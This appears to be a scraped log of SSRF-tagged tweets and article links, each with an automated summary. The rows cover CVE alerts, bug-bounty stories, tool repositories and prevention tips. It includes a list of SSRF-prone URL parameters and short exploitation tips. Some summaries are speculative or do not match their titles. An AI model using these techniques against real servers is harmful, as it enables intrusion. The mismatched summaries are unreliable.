| 606 | 2024-11-19 18:53:52 UTC | @JFrogSecurity: New 0-Day #CVE in GNU Wget Found: Our team uncovered CVE-2024-10524 a vulnerability that enables phishing #SSRF and #MiTM attacks by exploiting Wget's shorthand URL handling. Patch it now with Wget 1.25.0! Learn more: | A new 0-Day CVE-2024-10524 in GNU Wget has been discovered by @JFrogSecurity, enabling phishing, SSRF, and MiTM attacks through URL handling. The vulnerability can be patched with Wget 1.25.0. For more information, visit https://twitter.com/JFrogSecurity/status/1858942224647455107. |
| 607 | 2024-11-19 17:58:21 UTC | Joyerz5: Just Discovered a Cool SSRF!! Now working to make it Impactful!! Any tips guys? How I Found it? On the Image Upload features there was fetch image from URL guess what? Yes I put burp collaborator Link there and got HTTP DNS response back! It is confirm now! #ssrf #bugbounty | The content describes a cybersecurity enthusiast, Joyerz5, who discovered a Server-Side Request Forgery (SSRF) vulnerability while testing an image upload feature. By inserting a Burp Collaborator link, they received an HTTP DNS response, confirming the SSRF. Joyerz5 is now seeking tips to maximize the impact of this finding, indicating involvement in bug bounty programs. The post highlights the importance of identifying and exploiting vulnerabilities like SSRF for security testing and rewards. |
| 608 | 2024-11-19 15:58:37 UTC | CCBalert: Warning: Critical vulnerability in #Wget. #CVE-2024-10524 CVSS: 9.8. This #0-day vulnerability could lead to phishing server-side request forgery (#SSRF) and man-in-the-middle (#MiTM) attacks. #Patch #Patch #Patch | A critical vulnerability (#CVE-2024-10524) in #Wget with a CVSS score of 9.8 has been identified, posing risks of phishing, server-side request forgery (#SSRF), and man-in-the-middle (#MiTM) attacks. This #0-day vulnerability requires immediate patching to prevent exploitation. The alert emphasizes the urgency of applying patches to mitigate potential security threats. |
| 609 | 2024-11-19 11:53:38 UTC | @docbagaria: Broken bones fixed with some metal. #SSRF @drbhavpatel | The tweet by @docbagaria mentions fixing broken bones with metal, possibly referring to orthopedic surgery involving metal implants. The hashtag #SSRF and mention of @drbhavpatel suggest a discussion related to orthopedic procedures or medical advancements. The tweet does not provide detailed information but hints at the use of metal in bone repair, possibly highlighting the use of surgical techniques for treating fractures. |
| 610 | 2024-11-18 18:58:50 UTC | JFrogSecurity: Critical 0-Day in GNU Wget Found: Our team uncovered #CVE-2024-10524 a vulnerability that enables phishing #SSRF and #MiTM attacks by exploiting Wget's shorthand URL handling. Patch it now with Wget 1.25.0! Learn more: | A critical 0-Day vulnerability, CVE-2024-10524, was discovered in GNU Wget by JFrogSecurity. This flaw allows for phishing, SSRF, and MiTM attacks through exploiting Wget's URL handling. The recommended action is to patch it immediately with Wget 1.25.0. Further details can be found on JFrogSecurity's Twitter page. |
| 611 | 2024-11-18 07:48:25 UTC | InfoSecComm: New Writeup Alert! "SSRF to Internal Port Scanning on Self-Hosted Platform " by JEETPAL is now live on IW! Check it out here: #ssrf #bugbountytips #bugbounty #bugbountywriteup #cybersecurity | A new writeup titled "SSRF to Internal Port Scanning on Self-Hosted Platform" by JEETPAL has been published on InfoSecComm. The writeup focuses on SSRF vulnerability and internal port scanning. It is available on IW and covers bug bounty tips and cybersecurity. The content can be found on the provided link. #ssrf #bugbountytips #bugbounty #bugbountywriteup #cybersecurity. |
| 612 | 2024-11-17 13:48:27 UTC | ProwlSec: SSRF Unleashed How to find and where to find: #BugBounty #bugbountytip #hackers #Pentesting #SSRF #Hacking #HUNTER #Anonymous #Tips #CyberSecurity | The content discusses ProwlSec's release on SSRF exploitation, providing guidance on how and where to find SSRF vulnerabilities. It emphasizes bug bounty tips, hacking, penetration testing, and cybersecurity. The information is shared on Twitter by ProwlSec. |
| 613 | 2024-11-12 06:28:32 UTC | Chaithr62162203: Connecting with the Divine helps us handle lifes ups and downs with more clarity and strength giving us a sense of calm and helping us understand our true path. Take a moment today to reconnect with the Divine and feel the tranquility it brings. #SSRF | Connecting with the Divine provides clarity, strength, calmness, and understanding of our life's path. Reconnecting with the Divine can bring tranquility. #SSRF |
| 614 | 2024-11-11 10:28:09 UTC | bugvsecurity: Unveiling the Dangers of SSRF Attacks! Did you know that a single SSRF vulnerability can allow attackers to gain unauthorized access to your internal network and cloud resources? Read now to stay ahead of cyber threats #CyberSecurity #SSRF | The content discusses the dangers of Server-Side Request Forgery (SSRF) attacks, highlighting how a single vulnerability can grant unauthorized access to internal networks and cloud resources. It emphasizes the importance of staying informed about cybersecurity threats. The post encourages readers to read further to enhance their understanding and readiness to combat such cyber threats. #CyberSecurity #SSRF. |
| 615 | 2024-11-09 17:19:07 UTC | InfosecMonk: Top 25 #SSRF parameters ?dest={target} ?redirect={target} ?uri={target} ?path={target} ?continue={target} ?url={target} ?window={target} ?next={target} ?data={target} ?reference={target} ?site={target} | The content discusses the top 25 Server-Side Request Forgery (SSRF) parameters, including examples like ?dest={target}, ?redirect={target}, and ?url={target}. These parameters can be exploited by attackers for SSRF attacks. The list provides insight into common parameters that may be vulnerable to such attacks. The information is shared by InfosecMonk on Twitter. |
| 616 | 2024-11-07 14:13:18 UTC | @inj3ct0r: #0day #SmartAgent 1.1.0 Server-Side Request Forgery #Vulnerability #SSRF | The content highlights a Server-Side Request Forgery vulnerability in SmartAgent 1.1.0, tagged as a zero-day exploit. The vulnerability allows attackers to manipulate server requests, potentially leading to unauthorized access or data leakage. The information was shared on Twitter by the user @inj3ct0r. |
| 617 | 2024-11-05 04:04:41 UTC | Peet28385834: Server-Side Request Forgery in Qualitor (SSRF) | Bugbounty PoC #bugbounty #bugbountytips #ssrf #qualitor #tips #hackerone | The content discusses a Server-Side Request Forgery (SSRF) vulnerability found in Qualitor, shared as a Bug Bounty Proof of Concept (PoC) by Peet28385834. The post includes relevant hashtags such as #bugbounty, #ssrf, #qualitor, and #hackerone, indicating it is related to bug bounty programs and security testing. The link provided leads to a tweet by Peet28385834 discussing the SSRF vulnerability in Qualitor. |
| 618 | 2024-11-04 15:58:41 UTC | @raahul06: Server-Side Request Forgery (SSRF): SSRF vulnerabilities let attackers trick the server into making unauthorized requests to internal resources potentially exposing sensitive data. Implement input validation and strict access controls to prevent this! #SSRF #OWASP #WebSec | The content warns about Server-Side Request Forgery (SSRF) vulnerabilities that allow attackers to manipulate servers into making unauthorized requests to internal resources, risking sensitive data exposure. It advises implementing input validation and strict access controls to mitigate this risk. The message emphasizes the importance of security measures to prevent SSRF attacks in web applications. |
| 619 | 2024-11-03 09:58:13 UTC | s41r4j: Server-Side Request Forgery (#SSRF): - #Enumerate internal #networks including IP addresses and ports - Abuse trust relationships between #servers and gain access to otherwise restricted services - Interact with some non-HTTP services to get remote code execution (#RCE) | The content discusses Server-Side Request Forgery (#SSRF), highlighting its capabilities: - Enumerating internal networks, IP addresses, and ports - Abusing trust relationships between servers to access restricted services - Interacting with non-HTTP services for remote code execution (#RCE). The information is shared via a tweet by s41r4j. |
| 620 | 2024-10-31 13:48:58 UTC | s41r4j: #BugBounty vulnerabilities - for beginners: - #XSS - #SQL #injection - #CSRF - #SSRF - #IDOR - Information Disclosure - Directory Transversal - Open Redirect - Web Cache Poisoning | The content discusses various Bug Bounty vulnerabilities for beginners, including XSS, SQL injection, CSRF, SSRF, IDOR, Information Disclosure, Directory Traversal, Open Redirect, and Web Cache Poisoning. The information is shared by s41r4j on Twitter. |
| 621 | 2024-10-30 16:28:52 UTC | @CWISociety: Its always a good day to hear about #CWIS #SSRF guidelines from Past Prez @zmbauman. Thanks to #CAMIT for the opportunity! #cwismember | The content highlights a tweet from @CWISociety expressing appreciation for learning about #CWIS #SSRF guidelines from Past President @zmbauman, thanking #CAMIT for the opportunity. The tweet emphasizes the importance of staying informed and connected within the CWIS community. |
| 622 | 2024-10-30 15:19:12 UTC | CWISociety: Cheers for @realJSkubic as he knocks it out of the park on Thoracic Imaging at #CAMIT2024 today! #CWISmember #ssrf #chestwallinjuryeducation | @realJSkubic received praise for his presentation on Thoracic Imaging at #CAMIT2024 by CWISociety. The event highlighted chest wall injury education and showcased his expertise. He is recognized as a valuable member of CWIS and the SSRF community. The tweet celebrates his success and contributions in the field. |
| 623 | 2024-10-28 23:13:16 UTC | @howdocomputer: Unauth #SSRF & #XSS on | The content mentions the discovery of unauthorized Server-Side Request Forgery (SSRF) and Cross-Site Scripting (XSS) vulnerabilities. These vulnerabilities can potentially allow attackers to manipulate server requests and inject malicious scripts into a website. It is crucial for website owners to address and patch these vulnerabilities to prevent exploitation by malicious actors. |
| 624 | 2024-10-28 08:43:53 UTC | @KonwarAbhi98099: Blind SSRF on a Hackerone Program Credit: #$ubh@nk@r #ssrf | The content mentions a Twitter post by user @KonwarAbhi98099 about discovering a Blind Server-Side Request Forgery (SSRF) vulnerability in a Hackerone program. The post credits the discovery to user #$ubh@nk@r. The specific details or implications of the vulnerability are not provided in the summary. |
| 625 | 2024-10-27 16:04:28 UTC | nmkannans: Common SSRF misconceptions during the interviews - OWASP top 10 #SSRF #bugbountytip #bugbountytips #CyberSecurity | The content discusses common misconceptions about Server-Side Request Forgery (SSRF) during interviews, referencing OWASP top 10. It touches on SSRF-related topics such as bug bounty tips and cybersecurity. The Twitter post by user nmkannans highlights the importance of understanding and addressing SSRF vulnerabilities in the context of cybersecurity. |
| 626 | 2024-10-26 17:31:45 UTC | (PDF) Surgical stabilization of rib fractures (SSRF): the WSES and CWIS position paper | The content is a position paper on Surgical Stabilization of Rib Fractures (SSRF) by the World Society of Emergency Surgery (WSES) and the Chest Wall Injury Society (CWIS). The paper likely discusses the indications, techniques, and outcomes of SSRF, emphasizing the importance of this surgical intervention in managing rib fractures. It may also provide guidelines and recommendations for healthcare professionals involved in the care of patients with rib fractures. |
| 627 | 2024-10-23 05:13:51 UTC | DanaEpp: Check out this article to learn how to find and exploit server-side request forgery (SSRF) vulnerabilities in an API. #apihacking #ssrf | The content shared by DanaEpp focuses on learning how to identify and exploit server-side request forgery (SSRF) vulnerabilities in an API. The tweet encourages checking out an article for insights into API hacking and SSRF. DanaEpp provides a link to the article for further information on this topic. The post is tagged with #apihacking and #ssrf to highlight the relevance of the content. |
| 628 | 2024-10-22 08:28:30 UTC | @davidwillisowen: Huntr is a bug bounty platform designed specifically for AI/ML libraries The top 3 bugs that keep cropping up are LFI RCE and SSRF #hacking #bugbounty #ssrf | Huntr is a bug bounty platform for AI/ML libraries. The top recurring bugs are LFI, RCE, and SSRF. This information was shared on Twitter by @davidwillisowen. #hacking #bugbounty #ssrf |
| 629 | 2024-10-22 00:48:44 UTC | iototsecnews: Plane プロジェクト管理ツールの脆弱性 CVE-2024-47830 が FIXCVSS 値 9.3 の SSRF #OpenSource #Plane #ProjectManagement #SSRF #Vulnerability | The content discusses a vulnerability (CVE-2024-47830) in the Plane project management tool with a FIXCVSS score of 9.3 due to SSRF. The post highlights the vulnerability in the open-source project management tool and includes relevant hashtags like #OpenSource, #Plane, #ProjectManagement, #SSRF, and #Vulnerability. |
| 630 | 2024-10-21 15:04:37 UTC | @grumpzsux: Advanced SSRF via HTTP/2 Frames: Exploit HTTP/2 frame multiplexing to send SSRF payloads to internal services that are otherwise protected. Target servers misconfigured with H2C (HTTP/2 Cleartext) support. #SSRF #HTTP2Exploits #BugBounty | The content discusses exploiting HTTP/2 frame multiplexing for advanced SSRF attacks, targeting servers misconfigured with H2C support. This method allows sending SSRF payloads to internal services that are usually protected. The post highlights the potential vulnerability and encourages awareness of SSRF, HTTP/2 exploits, and bug bounty programs. The information is shared on Twitter by the user @grumpzsux. |
| 631 | 2024-10-21 10:43:48 UTC | grumpzsux: Abusing WebSockets for SSRF: Use WebSocket connections to exploit poorly validated Origin headers. Use this to bypass SSRF protections or access internal services behind firewalls. #WebSocketExploitation #SSRF #BugBounty | The content discusses exploiting WebSockets for SSRF by manipulating poorly validated Origin headers. This can be used to bypass SSRF protections and access internal services behind firewalls. The post highlights the potential security risks and encourages bug bounty hunters to explore WebSocket exploitation for vulnerabilities. The Twitter link provides more details on this topic. #WebSocketExploitation #SSRF #BugBounty. |
| 632 | 2024-10-21 04:13:36 UTC | JagoJainJagore: 200 Avdhan - Mahashatvadhan by a Jain Monkसगर क मत #jainism #ssrf #jain #saraswati #ratlam #jainreel #jaijinendra | The content discusses "JagoJainJagore: 200 Avdhan - Mahashatvadhan" by a Jain Monk, focusing on spiritual awakening and enlightenment. It includes hashtags related to Jainism, SSRF, Saraswati, Ratlam, Jainreel, and Jaijinendra. The Twitter post shares insights and teachings related to Jain philosophy and spirituality. |
| 633 | 2024-10-17 16:22:54 UTC | Exfiltrated, Signed, Delivered – What Can Go Wrong When an Amazon Elastic Compute Cloud (EC2) Instance is Exposed to SSRF | The content discusses the risks of exposing an Amazon Elastic Compute Cloud (EC2) instance to Server-Side Request Forgery (SSRF). By using CNAPPgoat, users can explore how SSRF can be exploited to make unauthorized calls to AWS services from within an EC2 instance. This highlights the potential security vulnerabilities that can arise when SSRF is not properly mitigated, emphasizing the importance of securing EC2 instances to prevent such attacks. |
| 634 | 2024-10-17 16:18:22 UTC | Cybersecurity, IT Courses & Training Catalog - Cybrary | Cybrary offers a catalog of cybersecurity and IT courses and training, focusing on certification preparation. The platform aims to educate individuals, businesses, and organizations in the field of cybersecurity and IT. |
| 635 | 2024-10-17 16:17:03 UTC | Carrying Out Your First SSRF Attack - Introduction to Server-Side Request Forgery Lesson | QA Platform | The content introduces a lesson on Server-Side Request Forgery (SSRF) attacks on the QA Platform. It encourages individuals to begin learning about SSRF attacks through their digital training solutions. |
| 636 | 2024-10-17 16:16:52 UTC | hacktricks/pentesting-web/ssrf-server-side-request-forgery/README.md at master · HackTricks-wiki/hacktricks | The content is a repository called "HackTricks" that contains various tricks, techniques, and knowledge related to cybersecurity, learned from Capture The Flag competitions, real-world applications, research, and news. It serves as a resource for individuals interested in learning about topics like server-side request forgery (SSRF) in web pentesting. The repository aims to provide a comprehensive collection of information to help individuals enhance their understanding of cybersecurity concepts and improve their skills in this field. |
| 637 | 2024-10-17 16:16:42 UTC | Server-Side Request Forgery (SSRF) | The content highlights a global security provider trusted by major organizations, utilizing ethical hackers for agile security testing. The emphasis is on a community of ethical hackers who approach security challenges from an attacker's perspective. The provider offers crowdsourced security services to enhance security measures for organizations. |
| 638 | 2024-10-17 16:15:33 UTC | Server-Side Request Forgery (SSRF) involves an attacker tricking a server into making unauthorized… | The blog post discusses Server-Side Request Forgery (SSRF), where attackers deceive servers into making unauthorized requests. It covers the definition of SSRF, its impact, how it operates, and basic prevention measures. |
| 639 | 2024-10-17 16:14:39 UTC | Let’s Understand SSRF vulnerability | The content provides an introduction to understanding SSRF (Server-Side Request Forgery) vulnerability. SSRF is a type of security vulnerability that allows an attacker to manipulate the server into making unauthorized requests on their behalf. This can lead to data breaches, unauthorized access, and other security risks. Understanding SSRF is crucial for developers and security professionals to prevent and mitigate such vulnerabilities in web applications. |
| 640 | 2024-10-17 16:14:28 UTC | 👩💻Roadmap to Cybersecurity in 2022, Full-Read SSRF, IDOR in GraphQL, GCP Pentesting, and much… | The content discusses a talk focusing on cybersecurity in 2022, covering topics such as SSRF, IDOR in GraphQL, GCP Pentesting, and more. The talk highlights the significant value, over $25 billion, that is at risk due to practical attacks on bridges. It emphasizes the importance of understanding and addressing vulnerabilities in cybersecurity to protect valuable assets. |
| 641 | 2024-10-17 16:14:20 UTC | 👩💻 $600k Bounty, Jetty Features, Response Queue Poisoning, Bypass SSRF Protections, XSS… | A $600K bounty was awarded due to a business logic flaw in smart contracts. |
| 642 | 2024-10-17 16:12:35 UTC | Exploiting: SSRF For Admin Access | The content is about exploiting Server-Side Request Forgery (SSRF) vulnerabilities to gain admin access. SSRF allows attackers to make requests on behalf of the server, potentially accessing internal systems or performing unauthorized actions. By manipulating URLs, attackers can trick the server into fetching sensitive data or executing commands. This can lead to unauthorized access to admin interfaces, compromising the system's security. The article likely discusses the risks of SSRF vulnerabilities, the impact on system security, and potential mitigation strategies to prevent such attacks. |
| 643 | 2024-10-17 16:12:23 UTC | Server-Side Request Forgery — SSRF: Exploitation Technique | Server-side request forgery (SSRF) is a vulnerability where an attacker can manipulate a server to make unauthorized HTTP requests. This exploitation technique can lead to sensitive data exposure, unauthorized access, and potential server compromise. Preventing SSRF involves input validation, using whitelists, and restricting server access to prevent attackers from exploiting this vulnerability. |
| 644 | 2024-10-17 16:11:30 UTC | Story of a 2.5k Bounty — SSRF on Zimbra Led to Dump All Credentials in Clear Text | The content discusses a successful bug bounty story where the author and a friend earned approximately $2500 from Cafebazaar by exploiting a Server-Side Request Forgery (SSRF) vulnerability on Zimbra, leading to the exposure of all credentials in clear text. |
| 645 | 2024-10-17 16:11:20 UTC | My First Bug: Blind SSRF Through Profile Picture Upload | The content is a writeup detailing the discovery of the author's first bug, which involves a blind Server-Side Request Forgery (SSRF) vulnerability through profile picture upload. The author likely shares their experience, the steps taken to identify the bug, and the impact of the vulnerability. This bug could potentially allow an attacker to manipulate the server into making requests on their behalf, leading to unauthorized access or data leakage. The writeup may also include insights on responsible disclosure and the importance of thorough security testing in web applications. |
| 646 | 2024-10-17 16:11:10 UTC | Story Behind Sweet SSRF. | The content emphasizes the importance of persistence in achieving success. It suggests that perseverance is crucial for reaching goals and overcoming challenges. The phrase "Persistence is the Key to Success" highlights the idea that consistent effort and determination are essential for accomplishing one's objectives. |
| 647 | 2024-10-17 16:10:34 UTC | Finding SSRF BY Full Automation | The content provided is too brief to summarize as it only contains a greeting. |
| 648 | 2024-10-17 16:07:23 UTC | 10 Types of Web Vulnerabilities that are Often Missed - Labs Detectify | The content discusses 10 commonly overlooked web vulnerabilities identified by hackers Hakluke and Farah Hawa. These vulnerabilities are often missed during security testing, particularly in bug bounty programs. By highlighting these overlooked issues, the article aims to improve web security measures and encourage thorough bug hunting practices. |
| 649 | 2024-10-17 16:06:49 UTC | How i found 3 SSRF in one day on different bug bounty targets. | The blog discusses the author's approach to bug bounty targets, detailing how they discovered three Server-Side Request Forgery (SSRF) vulnerabilities within 5-6 hours on different targets. The focus is on their successful identification of SSRF vulnerabilities and the speed at which they were able to find them. |
| 650 | 2024-10-17 16:06:41 UTC | Server Side Request Forgery — SSRF | Server Side Request Forgery (SSRF) is a web vulnerability that enables attackers to manipulate a server to make unauthorized requests. This issue can lead to data leaks, unauthorized access, and potential server exploitation. Preventing SSRF involves input validation, restricting access to sensitive resources, and using secure coding practices. It is crucial for developers and organizations to be aware of SSRF risks and implement robust security measures to mitigate this threat effectively. |
| 651 | 2024-10-17 16:06:07 UTC | Vimeo SSRF with code execution potential. | The content discusses the discovery of a semi-responded SSRF vulnerability on Vimeo that potentially allows for code execution. The author shares their process of finding and exploiting this vulnerability in a blog post. |
| 652 | 2024-10-17 16:05:55 UTC | BugBounty | A Simple SSRF | The content discusses a bug bounty program where the author encountered a Simple Server-Side Request Forgery (SSRF) vulnerability. Due to the private nature of the program, specific details cannot be disclosed. The focus is on the SSRF vulnerability, a common security issue that allows attackers to manipulate server requests. The author likely discovered and reported the vulnerability as part of the bug bounty program, emphasizing the importance of identifying and addressing such security flaws to protect systems from potential exploitation. |
| 653 | 2024-10-17 16:05:46 UTC | B-XSSRF - Toolkit To Detect And Keep Track On Blind XSS, XXE And SSRF | "B-XSSRF is a toolkit designed to detect and monitor Blind XSS, XXE, and SSRF vulnerabilities. The setup involves uploading files to a server and creating a database. The toolkit helps in identifying and tracking these security issues to enhance the overall security posture of a system." |
| 654 | 2024-10-17 16:05:14 UTC | SSRF Vulnerability due to Sentry misconfiguration | The content is vague and lacks specific details or information. It mentions a story related to a disclosed report but does not provide any context or details about the SSRF vulnerability due to Sentry misconfiguration. |
| 655 | 2024-10-17 16:05:02 UTC | SVG XLink SSRF fingerprinting libraries version | SSRF (Server-side request forgery) is a common attack surface, especially in uploading functionalities where applications fetch data. This vulnerability can be exploited by attackers to access internal systems or perform malicious actions. It is important to be aware of SSRF risks and implement proper security measures to prevent such attacks. |
| 656 | 2024-10-17 16:04:51 UTC | AWS takeover through SSRF in JavaScript | The content discusses a bug found in a private bug bounty program on Hackerone, where the author exploited a Server-Side Request Forgery (SSRF) vulnerability in JavaScript to obtain AWS credentials. This allowed them to compromise the company's AWS account, gaining control over 20 buckets and 80 EC2 instances. The author highlights the learning experience gained from this successful exploit and expresses a desire to share their knowledge. |
| 657 | 2024-10-17 11:43:24 UTC | breacharcom: Server-Side Request Forgery (SSRF) allows attackers to make unauthorized requests from the server potentially accessing internal systems. Protect your apps by validating and sanitizing user input. #SSRF #CyberSecurity #OSCP #OSWE #infosec #offsec #Pentesting #redteam | The content warns about Server-Side Request Forgery (SSRF) enabling unauthorized requests from servers, risking access to internal systems. It advises safeguarding apps by validating and sanitizing user input. The post emphasizes cybersecurity measures and mentions relevant hashtags like #OSCP, #OSWE, #infosec, #offsec, #Pentesting, and #redteam. |
| 658 | 2024-10-17 01:45:59 UTC | Server Side Request Forgery (SSRF) Testing | The content discusses Server Side Request Forgery (SSRF) testing for fun rather than for a bounty. The author discovered a website vulnerable to SSRF but did not exploit it. The focus is on testing and identifying SSRF vulnerabilities in web applications. |
| 659 | 2024-10-17 01:45:22 UTC | How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! | The content discusses the author's discovery and exploitation of four vulnerabilities on GitHub Enterprise, leading from SSRF execution to Remote Code Execution (RCE). The author mentions preparing for talks at Black Hat USA 2017 and DEF CON 25. The focus is on the technical details of the vulnerabilities found and the chain of events that led to RCE. |
| 660 | 2024-10-17 01:44:59 UTC | SSRF bible. Cheatsheet | The content is a cheatsheet on Server-Side Request Forgery (SSRF) with revision 1.03 from January 26, 2017. It includes information on basics, typical attack steps, and file descriptions related to SSRF. The authors are from the Wallarm research team, and the cheatsheet is available on their website. Additionally, a new product called Wallarm FAST for security tests from traffic is promoted. |
| 661 | 2024-10-15 17:13:53 UTC | Find SSRF , LFI , XSS using httpx , waybackurls , gf , gau , qsreplace | The content discusses utilizing tools like httpx, waybackurls, gf, gau, and qsreplace to find SSRF, LFI, and XSS vulnerabilities. These advanced bug bounty tips can aid in bug hunting. The author recommends visiting a website for more information, including videos on advanced subdomain reconnaissance, subdomain takeover, and proof of concept demonstrations. The content encourages readers to begin utilizing these tools for bug bounty hunting. |
| 662 | 2024-10-15 17:13:52 UTC | Digging for SSRF in NextJS apps | The content discusses the shift from heavyweight CMS like Wordpress to modern static landing pages for new businesses. It highlights the familiarity hackers have with attacking CMS solutions like Wordpress due to their well-understood attack surfaces. The focus is on the security implications, particularly Server-Side Request Forgery (SSRF), when developing landing pages using NextJS apps. |
| 663 | 2024-10-15 17:13:52 UTC | Owning the clout through SSRF and PDF generators - Public v1.0 | The content discusses how attackers can exploit Server-Side Request Forgery (SSRF) to manipulate server functionality and access internal resources. SSRF attacks enable unauthorized reading or modification of server data. |
| 664 | 2024-10-15 17:13:52 UTC | Oh snap! We don't support this version of your browser, and neither should you! | The content informs visitors of an unsupported browser, lacking necessary security features. It advises updating the browser for optimal performance and security. Visitors encountering this message in error are encouraged to contact the site, specifying their browser version for assistance. |
| 665 | 2024-10-15 17:13:51 UTC | Hunting for SSRF Bugs in PDF Generators | The content discusses how features like printing certificates, generating reports, and submitting digital signatures on websites can indicate vulnerabilities to server-side request forgery (SSRF) bugs. These features are potential hot spots for SSRF issues. The article suggests that these functionalities can be exploited by attackers. |
| 666 | 2024-10-15 17:13:47 UTC | blackhatethicalhacking/SSRFPwned | "SSRFPwned" is a resource created by Chris "SaintDruG" Abou-Chabké from Black Hat Ethical Hacking for Offensive Security attacks. |
| 667 | 2024-10-15 17:13:47 UTC | assetnote/surf | "surf" is a tool that filters a list of hosts to identify potential SSRF (Server-Side Request Forgery) candidates. It works by sending HTTP requests to hosts from your machine, collecting unresponsive hosts, and categorizing them as externally or internally facing. This process helps in identifying hosts vulnerable to SSRF attacks efficiently. |
| 668 | 2024-10-15 17:13:45 UTC | reddelexc/hackerone-reports | The content discusses HackerOne reports stored in data.csv, with update scripts in Python 3 needing chromedriver and Chromium executables in PATH. Each script includes operational details. The scripts should be run in the order of Tops 100 to update the reports effectively. |
| 669 | 2024-10-15 17:13:45 UTC | Th0h0/autossrf | The content highlights the tool "autoSSRF" as a valuable resource for detecting SSRF vulnerabilities efficiently and effectively. It emphasizes the tool's ability to identify SSRF vulnerabilities on a large scale, indicating its usefulness in enhancing security measures. |
| 670 | 2024-10-15 17:13:44 UTC | assetnote/blind-ssrf-chains | Server Side Request Forgery (SSRF) enables servers to make requests on behalf of users, potentially accessing internal resources. This vulnerability occurs when a server is coerced into making arbitrary requests. Exploiting SSRF allows attackers to leverage the server's network position for unauthorized access. |
| 671 | 2024-10-15 17:13:43 UTC | imran-parray/Mind-Maps | The repository contains Mindmaps for bug bounty hunters, pentesters, and security professionals, contributed by the owner and the community. It serves as a resource for offensive and defensive security strategies. |
| 672 | 2024-10-15 17:13:43 UTC | incredibleindishell/SSRF_Vulnerable_Lab | The repository "incredibleindishell/SSRF_Vulnerable_Lab" contains PHP code vulnerable to Server-Side Request Forgery (SSRF) attacks. It demonstrates how certain functions in programming languages can retrieve content from both local files and remote URLs, making them susceptible to exploitation. |
| 673 | 2024-10-15 17:13:42 UTC | swisskyrepo/SSRFmap | SSRFmap is a framework designed to identify and exploit SSRF vulnerabilities that can be used to manipulate actions on other services. It simplifies the process of finding and exploiting these vulnerabilities by taking a Burp request file and a parameter to fuzz as input. By leveraging SSRF, attackers can potentially access and manipulate sensitive information or perform unauthorized actions on various services. |
| 674 | 2024-10-14 13:13:57 UTC | mutantera0: Types of vpn #Cybersecurity #InfosecTools #EthicalHacking #PenTesting #CTF #Vulnerability #Hunting #SSRF #bugbountytips #bugbountytools #Securityresearch #bugbounty #vpn #virtualprivatenetwork | The content discusses different types of VPNs in the context of cybersecurity, ethical hacking, penetration testing, and bug bounty programs. It highlights the importance of VPNs in securing online activities and protecting sensitive information. The post also includes relevant hashtags related to cybersecurity and information security tools. The focus is on understanding the various types of VPNs and their role in enhancing online security. |
| 675 | 2024-10-13 17:18:54 UTC | spencer_5cent: @Hacker0x01 @prescientsec 2/2 5.If different IP/port combos show different response bodies. You have SSRF. 6. If you see CONSISTENT differences in response times for certain ports/IPs you have Blind SSRF. #ssrf @SynackRedTeam | The content discusses SSRF (Server-Side Request Forgery) detection methods shared by spencer_5cent on Twitter. It mentions that if different IP/port combinations yield different response bodies, it indicates SSRF. Additionally, consistent variations in response times for specific ports/IPs suggest Blind SSRF. The tweet includes the hashtag #ssrf and mentions @SynackRedTeam. |
| 676 | 2024-10-13 14:04:36 UTC | InfoStratosally: Beware of SSRF: A silent threat where attackers manipulate servers to access sensitive data or internal systems. Strengthen your defenses by validating inputs and restricting access! #Cybersecurity #SSRF #DataProtection | The content warns about SSRF (Server-Side Request Forgery), a threat where attackers manipulate servers to access sensitive data or internal systems. It emphasizes the importance of strengthening defenses by validating inputs and restricting access to mitigate this risk. The post underscores the significance of cybersecurity measures and data protection in safeguarding against SSRF attacks. |
| 677 | 2024-10-11 19:18:35 UTC | PHP SSRF Techniques | The content discusses PHP Server-Side Request Forgery (SSRF) techniques focusing on bypassing security measures like filter_var(), preg_match(), and parse_url(). It likely covers methods to manipulate input data to exploit vulnerabilities in these functions, potentially allowing attackers to make unauthorized requests from the server. The content may provide insights into how attackers can circumvent these common PHP functions to carry out SSRF attacks. |
| 678 | 2024-10-11 16:56:18 UTC | GitLab Patches Pipeline Execution SSRF XSS Vulnerabilities | GitLab recently addressed security vulnerabilities related to Pipeline Execution, Server-Side Request Forgery (SSRF), and Cross-Site Scripting (XSS) through patches. These vulnerabilities could potentially be exploited by attackers to compromise the security of GitLab instances. The patches aim to prevent these vulnerabilities from being exploited, enhancing the overall security of the platform. |
| 679 | 2024-10-11 12:43:37 UTC | @mutantera0: How To Integrate GPT Into Command Line #Cybersecurity #InfosecTools #EthicalHacking #PenTesting #CTF #VulnerabilityHunting #SSRF #bugbountytips #bugbountytools #SecurityResearch #bugbounty | The content shared by @mutantera0 on Twitter discusses integrating GPT (Generative Pre-trained Transformer) into the command line for various cybersecurity purposes like ethical hacking, penetration testing, CTF, vulnerability hunting, SSRF, bug bounty tips, and security research. The tweet provides insights into leveraging GPT technology within the command line for cybersecurity tasks. |
| 680 | 2024-10-10 07:23:12 UTC | mutantera0: 20 Very Advanced Information Gathering Tools #Cybersecurity #InfosecTools #EthicalHacking #PenTesting #CTF #VulnerabilityHunting #SSRF #bugbountytips #bugbountytools #SecurityResearch #bugbounty | The content highlights a list of 20 advanced information gathering tools relevant to cybersecurity, ethical hacking, penetration testing, Capture The Flag (CTF) challenges, vulnerability hunting, Server-Side Request Forgery (SSRF), bug bounty tips, bug bounty tools, and security research. The tools are shared by the Twitter user mutantera0. The post includes hashtags related to cybersecurity topics. |
| 681 | 2024-10-08 16:38:32 UTC | @S_Sasili: Simple script to chain SSRF issues with arbitrary HTTP redirect (with auth header) to trigger leaking sensitive headers. #Cybersecurity #InfosecTools #EthicalHacking #PenTesting #CTF #VulnerabilityHunting #SSRF #bugbountytips #bugbountytools #SecurityResearch #bugbounty | The content discusses a simple script created by @S_Sasili that chains SSRF vulnerabilities with arbitrary HTTP redirects, using an authentication header to expose sensitive headers. The script aims to aid in cybersecurity, ethical hacking, penetration testing, CTF challenges, vulnerability hunting, and bug bounty programs. It highlights the importance of security research and provides tools for bug bounty hunters. The script's purpose is to demonstrate a technique for exploiting SSRF vulnerabilities to leak sensitive information. The link provided directs to the original tweet by @S_Sasili. |
| 682 | 2024-10-08 13:28:54 UTC | redfoxsec: Understanding Server-Side Request Forgery (SSRF)! Explore this critical vulnerability that allows attackers to manipulate web apps into unauthorized requests. Learn how SSRF can: Access internal resources Bypass security measures #SSRF #CyberSecurity | The content discusses Server-Side Request Forgery (SSRF), a critical vulnerability that enables attackers to manipulate web apps for unauthorized requests. SSRF allows access to internal resources and bypasses security measures. This vulnerability poses a significant threat to cybersecurity. #SSRF #CyberSecurity. |
